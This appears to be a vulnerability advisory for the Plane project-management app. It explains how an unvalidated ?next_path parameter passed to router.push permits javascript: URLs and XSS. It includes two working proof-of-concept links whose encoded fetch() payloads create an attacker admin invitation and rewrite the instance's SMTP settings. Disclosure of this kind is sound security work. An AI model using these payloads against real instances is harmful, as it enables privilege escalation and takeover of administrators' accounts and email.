Summary

An open redirect vulnerability in the ?next_path query parameter allows attackers to supply arbitrary schemes (e.g., javascript:) that are passed directly to router.push. This results in a cross-site scripting (XSS) vulnerability, enabling attackers to execute arbitrary JavaScript in the victim’s browser. The issue can be exploited without authentication and has severe impact, including information disclosure, privilege escalation and modifications of administrative settings.

Details

The application uses an authentication wrapper that accepts the query parameter ?next_path to determine where users should be redirected after completing certain operations (such as login).

Currently, the implementation does not properly validate the ?next_path parameter. This allows arbitrary schemes such as javascript: to be supplied, for example:

?next_path=javascript:alert(origin)

When processed, the application executes:

router.push("javascript:alert(origin)")

This results in attacker-controlled JavaScript being executed in the victim’s browser. An attacker can leverage this to coerce the victim into making authenticated HTTP requests on their behalf, thereby invoking Plane APIs under the victim’s privileges.

PoC

Create Admin Account PoC

As an administrative user, visit the following link. This will trigger execution of attacker-supplied JavaScript, which in turn creates a new administrative account for the attacker and sends a registration email to their address.

Replace <TARGET_PLANE_INSTANCE> with the target instance URL, <WORKSPACE> with the target workspace, and <ATTACKER_EMAIL> with the attacker’s email:

https://<TARGET_PLANE_INSTANCE>/?next_path=javascript:fetch(%22%2Fapi%2Fworkspaces%2F<WORKSPACE>%2Finvitations%2F%22%2C%20%7Bmethod%3A%22POST%22%2C%20headers%3A%7B%22Content-Type%22%3A%22application%2Fjson%22%7D%2C%20body%3AJSON.stringify(%7Bemails%3A%5B%7Bemail%3A%22<ATTACER_EMAIL>%22%2Crole%3A20%7D%5D%7D)%7D)%3B

Change SMTP Server PoC

As an administrative user, visit the following link. This will execute attacker-supplied JavaScript to modify the SMTP configuration of the instance, giving the attacker control over outbound email delivery.

Replace placeholders <TARGET_PLANE_INSTANCE>, <SMTP_HOST>, <SMTP_PORT>, <EMAIL_USER>, <EMAIL_PASS>, and <SENDER>:

https://<TARGET_PLANE_INSTANCE>/?next_path=javascript:fetch(%27/api/instances/configurations/%27,+{method%3a%27PATCH%27,+headers%3a{%27Content-Type%27%3a%27application/json%27},+body%3a%27{%22EMAIL_HOST%22%3a%22<SMTP_HOST>%22,%22EMAIL_PORT%22%3a%22<SMTP_PORT>%22,%22EMAIL_HOST_USER%22<EMAIL_USER>%22,%22EMAIL_HOST_PASSWORD%22%3a%22<EMAIL_PASS>%22,%22EMAIL_USE_TLS%22%3a%221%22,%22EMAIL_USE_SSL%22%3a%220%22,%22EMAIL_FROM%22<SENDER>%22}%27})

Impact

An anonymous attacker could leverage this XSS vulnerability to steal sensitive data, escalate privileges by creating new admin accounts, or tamper with critical settings such as the SMTP server configuration.